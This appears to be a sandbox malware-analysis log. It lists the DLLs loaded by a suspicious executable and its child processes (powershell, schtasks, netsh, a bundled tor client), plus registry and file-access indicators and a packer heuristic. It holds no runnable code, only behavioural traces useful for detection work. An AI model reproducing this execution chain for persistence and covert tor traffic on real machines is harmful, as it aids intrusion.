Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: httpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libevent-2-1-7.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libssp-0.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libssp-0.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libgcc_s_sjlj-1.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libwinpthread-1.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libwinpthread-1.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libssl-1_1.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: zlib1.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

.NET source code contains method to dynamically call methods (often used by packers)

Source: yt7dW9nyJK.exe

